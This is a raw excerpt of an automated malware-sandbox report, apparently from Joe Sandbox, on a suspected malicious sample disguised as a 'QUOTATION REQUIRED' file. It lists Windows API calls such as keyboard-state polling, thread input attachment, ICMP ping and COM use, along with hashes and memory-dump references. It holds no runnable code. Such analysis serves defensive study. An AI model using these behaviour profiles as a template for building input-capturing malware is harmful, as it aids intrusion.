• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F669B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F28BBA,00000000), ref: 00F669D4
• DeleteObject.GDI32(00000000), ref: 00F669E6
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 71a07e1f97c80ca1ecd0b84a38c7903ca708c0f0be3fb107785658bdc0e561fd
• Instruction ID: 693329cc880dd042a12cde1355d877f349e7029ac7ac17358a3c95f5d2aaa993
• Opcode Fuzzy Hash: 71a07e1f97c80ca1ecd0b84a38c7903ca708c0f0be3fb107785658bdc0e561fd
• Instruction Fuzzy Hash: D861CD31902668DFDB259F25EA88B29B7F1FB41362F14851DE0429B560CB35AD82FF90
APIs
  • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
• GetSysColor.USER32(0000000F), ref: 00F29862
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: d1eab0cbd18c765409f24ddde9dc467e52fb477c3ea16ced3e9f7dd6ab0d1634
• Instruction ID: 19da1f8c25153c4cf7d2b4f39bb38598868697d8216c51a6bfdfedda8ffea445
• Opcode Fuzzy Hash: d1eab0cbd18c765409f24ddde9dc467e52fb477c3ea16ced3e9f7dd6ab0d1634
• Instruction Fuzzy Hash: 4E41C4719086549FDB209F38AC88BF93BA5EB17330F584655F9A2872E2C7719C42FB50
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F79717
                                                                                                                    • LoadStringW.USER32(00000000,?,00F5F7F8,00000001), ref: 00F79720
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F5F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F79742
                                                                                                                    • LoadStringW.USER32(00000000,?,00F5F7F8,00000001), ref: 00F79745
                                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F79866
                                                                                                                    Strings
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: 8582aa3f8eafa69c2fb6970335afecae999818136ccd365cc718a80c51fb8c3d
• Instruction ID: e8f3fc8f8e0d2073ad2b8631416c4659e5dc8dd93420a0df7f78697d1609108a
• Opcode Fuzzy Hash: 8582aa3f8eafa69c2fb6970335afecae999818136ccd365cc718a80c51fb8c3d
• Instruction Fuzzy Hash: BB419672804219AACF04FBE0DD52DEE7378EF15350F504026F605B2092EB796F88EBA1
APIs
• VariantInit.OLEAUT32(?), ref: 00F93C5C
• CoInitialize.OLE32(00000000), ref: 00F93C8A
• CoUninitialize.OLE32 ref: 00F93C94
• _wcslen.LIBCMT ref: 00F93D2D
• GetRunningObjectTable.OLE32(00000000,?), ref: 00F93DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00F93ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F93F0E
• CoGetObject.OLE32(?,00000000,00FAFB98,?), ref: 00F93F2D
• SetErrorMode.KERNEL32(00000000), ref: 00F93F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F93FC4
• VariantClear.OLEAUT32(?), ref: 00F93FD8
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: 79873f2a8aae80326f6f7c4ce53d3a2ac0940e91cd1b7631a34e04f3902f1009
• Instruction ID: 0c16f0b591482791b3e553c6de31969531d24a3e1dc8bd011d5b2e4b5cd7d7a8
• Opcode Fuzzy Hash: 79873f2a8aae80326f6f7c4ce53d3a2ac0940e91cd1b7631a34e04f3902f1009
• Instruction Fuzzy Hash: 58C147716083059FDB00DF68C88492BB7E9FF89758F00491DF98A9B250DB31EE45DB92
APIs
• CoInitialize.OLE32(00000000), ref: 00F87AF3
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F87B8F
• SHGetDesktopFolder.SHELL32(?), ref: 00F87BA3
• CoCreateInstance.OLE32(00FAFD08,00000000,00000001,00FD6E6C,?), ref: 00F87BEF
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F87C74
• CoTaskMemFree.OLE32(?,?), ref: 00F87CCC
• SHBrowseForFolderW.SHELL32(?), ref: 00F87D57
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F87D7A
• CoTaskMemFree.OLE32(00000000), ref: 00F87D81
• CoTaskMemFree.OLE32(00000000), ref: 00F87DD6
• CoUninitialize.OLE32 ref: 00F87DDC
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 15a0dae546e3827789e98dabb2de8540658057ced2d482a51865345592732ca1
• Instruction ID: 7668f9e2d62ae3e3e7aaf1bee10aec43d2825f789c39a8cca2eb7006d0b64f9f
• Opcode Fuzzy Hash: 15a0dae546e3827789e98dabb2de8540658057ced2d482a51865345592732ca1
• Instruction Fuzzy Hash: 61C13C75A04209AFCB14EFA4C884DAEBBF9FF49314B148499E819DB361D734EE41DB90
APIs
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FA5504
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA5515
• CharNextW.USER32(00000158), ref: 00FA5544
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FA5585
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FA559B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA55AC
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: b608b328989b13a9b1395224062f965a1f2f6bb7943005e9580c7807ca4569a2
• Instruction ID: 21150df50cbd2ea1e9cccd6ff8521dc08e8cc868c4022360ed0dcc5f65ec9ba2
• Opcode Fuzzy Hash: b608b328989b13a9b1395224062f965a1f2f6bb7943005e9580c7807ca4569a2
• Instruction Fuzzy Hash: AC617AB5900608EFDF10DF54CC84AFE7BB9EF0BB24F144145F925AA290D7749A80EBA1
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F6FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 00F6FB08
• VariantInit.OLEAUT32(?), ref: 00F6FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00F6FB3A
• VariantCopy.OLEAUT32(?,?), ref: 00F6FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00F6FBA1
• VariantClear.OLEAUT32(?), ref: 00F6FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00F6FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F6FBCC
• VariantClear.OLEAUT32(?), ref: 00F6FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F6FBE9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 3eb6bd866d19b38830bae574ee011d9845f806be38ca6f16e48113a3b58ad32b
• Instruction ID: 8cea5bf8569c71aa4b6d4d9bd912986544dd6214946e79738b6841291cd7cf25
• Opcode Fuzzy Hash: 3eb6bd866d19b38830bae574ee011d9845f806be38ca6f16e48113a3b58ad32b
• Instruction Fuzzy Hash: BF414E75A00219DFCB00DFA8DC549EEBBB9FF49354F008069E956A7261CB34E945EBA0
APIs
• GetKeyboardState.USER32(?), ref: 00F79CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00F79D22
• GetKeyState.USER32(000000A0), ref: 00F79D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00F79D57
• GetKeyState.USER32(000000A1), ref: 00F79D6C
• GetAsyncKeyState.USER32(00000011), ref: 00F79D84
• GetKeyState.USER32(00000011), ref: 00F79D96
• GetAsyncKeyState.USER32(00000012), ref: 00F79DAE
• GetKeyState.USER32(00000012), ref: 00F79DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00F79DD8
• GetKeyState.USER32(0000005B), ref: 00F79DEA
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 8c1073041c1dd52d0568cc73f5d9ac12e4f63fc1092c4ba03e11c064733c484a
• Instruction ID: 32b0c06d9391f8406750dbd87ea491eeb917cbd1026672604f9a4580f8fdb7a0
• Opcode Fuzzy Hash: 8c1073041c1dd52d0568cc73f5d9ac12e4f63fc1092c4ba03e11c064733c484a
• Instruction Fuzzy Hash: 8C41D874D0C7CA6DFF31876484043B5BEA06B12364F08C05BDACA566C2EBE499C4E7A3
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00F905BC
• inet_addr.WSOCK32(?), ref: 00F9061C
• gethostbyname.WSOCK32(?), ref: 00F90628
• IcmpCreateFile.IPHLPAPI ref: 00F90636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F906C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F906E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 00F907B9
• WSACleanup.WSOCK32 ref: 00F907BF
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                    • String ID: Ping
                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                    • Opcode ID: f6b789fed822473bd576c8bd147c638033573590e974d682b597b6822ef97268
                                                                                                                    • Instruction ID: 12e2d03363fbf8cef500e97e57f73fb2a3221813eb086b965ea12ff4c7011f47
                                                                                                                    • Opcode Fuzzy Hash: f6b789fed822473bd576c8bd147c638033573590e974d682b597b6822ef97268
                                                                                                                    • Instruction Fuzzy Hash: 57919175A042019FEB10CF15C888F16BBE0AF44328F1585A9F4698B6A2CB34FC45DF92
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                    • Opcode ID: 5c3f110b33cc30d78fb69ffad6749dcc7ab0f888d2f59645d18575913084aa82
                                                                                                                    • Instruction ID: e41939aa086541f6f1e3d560f1090c729afbc6e2192dce7d92c9b85b7af66a52
                                                                                                                    • Opcode Fuzzy Hash: 5c3f110b33cc30d78fb69ffad6749dcc7ab0f888d2f59645d18575913084aa82
                                                                                                                    • Instruction Fuzzy Hash: 0851B332E001169BDF14EFA8C8509BEB7A5BF663B0B24422AE416E72C4DB35DD41E790
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32 ref: 00F93774
                                                                                                                    • CoUninitialize.OLE32 ref: 00F9377F
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00FAFB78,?), ref: 00F937D9
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00F9384C
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F938E4
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F93936
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                    • Opcode ID: 484cd092a8a294d9f5654280ed03601c6819937100a538bfad4866d684f09012
                                                                                                                    • Instruction ID: a7f8bfe8f97b7fc21370cb19ac6f373993c8e2df281d610031893ae0de2c4240
                                                                                                                    • Opcode Fuzzy Hash: 484cd092a8a294d9f5654280ed03601c6819937100a538bfad4866d684f09012
                                                                                                                    • Instruction Fuzzy Hash: B661A1B2608311AFE711DF54C848F6ABBE8EF49710F044809F9859B291D774EE48EB93
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F833CF
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F833F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                                    • Opcode ID: 053a58b7fb703e1d5c6eb5f402dfa044065c81477db1dc8e0d1a6e2308dee297
                                                                                                                    • Instruction ID: 2692307d57edf32ec1436b688cc34cd218fa2824298c51ab6c806d3df3162415
                                                                                                                    • Opcode Fuzzy Hash: 053a58b7fb703e1d5c6eb5f402dfa044065c81477db1dc8e0d1a6e2308dee297
                                                                                                                    • Instruction Fuzzy Hash: 4951B371C0020AAADF14EBA0DD42EEEB379AF04740F144066F505B2161EB796F98FB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 1256254125-769500911
                                                                                                                    • Opcode ID: 4ca3a491c1a7657c115504904de9990e213366f8e9aa9614be9d5f2fe7f01942
                                                                                                                    • Instruction ID: f1f50f1d8d44656d90cf8beda60bb62c31ec6678e1d561518d252bff0dbd4ef0
                                                                                                                    • Opcode Fuzzy Hash: 4ca3a491c1a7657c115504904de9990e213366f8e9aa9614be9d5f2fe7f01942
                                                                                                                    • Instruction Fuzzy Hash: 87412B32E0002A9BCB105F7DCC907BE77A1AF62774B24816BE629D7284E735CD81E791
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F853A0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F85416
                                                                                                                    • GetLastError.KERNEL32 ref: 00F85420
                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F854A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 36fc99c8e529513dd42fdcdae63c65f8dadf23f363f48acd03f29ce50d8ee4cd
                                                                                                                    • Instruction ID: 42f97ba918a4bc2e8a3441be12fcbce5e61a54d4c28cec2af4f34f738638d399
                                                                                                                    • Opcode Fuzzy Hash: 36fc99c8e529513dd42fdcdae63c65f8dadf23f363f48acd03f29ce50d8ee4cd
                                                                                                                    • Instruction Fuzzy Hash: 7131CE75A002049FDB10EF68C894BEABBB5EF45715F188066E405CB392DB71ED82EB90
                                                                                                                    APIs
                                                                                                                    • CreateMenu.USER32 ref: 00FA3C79
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00FA3C88
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA3D10
                                                                                                                    • IsMenu.USER32(?), ref: 00FA3D24
                                                                                                                    • CreatePopupMenu.USER32 ref: 00FA3D2E
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA3D5B
                                                                                                                    • DrawMenuBar.USER32 ref: 00FA3D63
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                    • Opcode ID: 60fb384dff5ee55b9aaaa869f3cadb45d3c0d699147767ee63f8051ec6da3bfe
                                                                                                                    • Instruction ID: 6ec3d12110354ffb4bf51d2ed8593c3bb97b76de9ef760408f1aff4b28868d5c
                                                                                                                    • Opcode Fuzzy Hash: 60fb384dff5ee55b9aaaa869f3cadb45d3c0d699147767ee63f8051ec6da3bfe
                                                                                                                    • Instruction Fuzzy Hash: 94412CB5A01209EFDB14CF65D884AEA7BF5FF4A360F140029F946A7360D771AA10EF94
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F71F64
                                                                                                                    • GetDlgCtrlID.USER32 ref: 00F71F6F
                                                                                                                    • GetParent.USER32 ref: 00F71F8B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F71F8E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00F71F97
                                                                                                                    • GetParent.USER32(?), ref: 00F71FAB
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00F71FAE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: d03d0b54182220f32808d1c729d5db004ad2cf3913d139ba82619c1c98aa0103
• Instruction ID: c65171eddec61e28ab29ab3766557e58e09644b67d2b935a27f8c17ed24f9311
• Opcode Fuzzy Hash: d03d0b54182220f32808d1c729d5db004ad2cf3913d139ba82619c1c98aa0103
• Instruction Fuzzy Hash: 4B21F275D00218BBCF11EFA4CC85EEEBBB8EF06350B004106F96963291CB785908FBA1
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FA3A9D
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FA3AA0
• GetWindowLongW.USER32(?,000000F0), ref: 00FA3AC7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA3AEA
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FA3B62
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FA3BAC
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FA3BC7
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FA3BE2
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FA3BF6
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FA3C13
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 11d41af3b5a41cef9458f4769af9a74e78f348b4196e2948f1a14535a42d4487
• Instruction ID: 1222fc9026a4e604a5fd9e090c031b9ac4b4032fc562c5c9ae34ad81929af061
• Opcode Fuzzy Hash: 11d41af3b5a41cef9458f4769af9a74e78f348b4196e2948f1a14535a42d4487
• Instruction Fuzzy Hash: 3C616DB5900248AFDB10DF64CC81EEE77F8EF49710F104159FA15A7291D774AE45EB60
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F7B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B165
• GetWindowThreadProcessId.USER32(00000000), ref: 00F7B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00F7B18D
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1A6
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1B8
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1FD
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B212
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B21D
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 2b66953516b97643abfe7d5568284e63b54a7bdb2435018a56a5fcb05043c3f0
• Instruction ID: 3870d3705b660a1b085a29802e778df11fa02e33e04fe26189388608cf1499ea
• Opcode Fuzzy Hash: 2b66953516b97643abfe7d5568284e63b54a7bdb2435018a56a5fcb05043c3f0
• Instruction Fuzzy Hash: 613152B590020CAFDB119F64EC8CB6D7B6AAB52325F108416FA09DB251D7B49E40EF61
APIs
• _free.LIBCMT ref: 00F42C94
